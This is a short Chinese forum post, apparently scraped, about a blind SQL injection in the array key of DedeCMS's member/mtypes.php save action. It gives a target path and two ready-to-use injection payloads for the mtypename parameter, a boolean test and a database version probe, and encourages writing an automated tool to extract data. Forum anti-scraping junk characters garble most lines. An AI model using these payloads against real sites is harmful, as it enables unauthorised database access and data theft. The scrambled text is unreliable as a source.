需要magic_quotes_gpc = Off,所以说是鸡肋啊., L3 X- s$ R& D* o+ P
8 R6 k- R' t1 t
4 j1 O% W& {0 V6 Z/ w0 h1 b发生在数组key里的注射漏洞,有点意思.: ~: U) }- `# n% d4 ^' y2 H M" U
) ? f' U5 `$ H3 J* z" H
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
9 b* m$ |$ n$ l/ M: D }
% {( F0 f; J, O D5 r/ M! W% z4 F g; J3 Whttp://www.xxx.com /dede/member/mtypes.php?dopost=save
. ?4 P& n! S& n9 }9 h 6 o* Q7 u8 o% e& {1 D# i: D7 M
exploit:
! [; S3 N/ g9 {0 `3 Y. fmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r. }# S7 F' A6 L8 f- n! w" K
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r& M! f' }0 j ~; g% t
|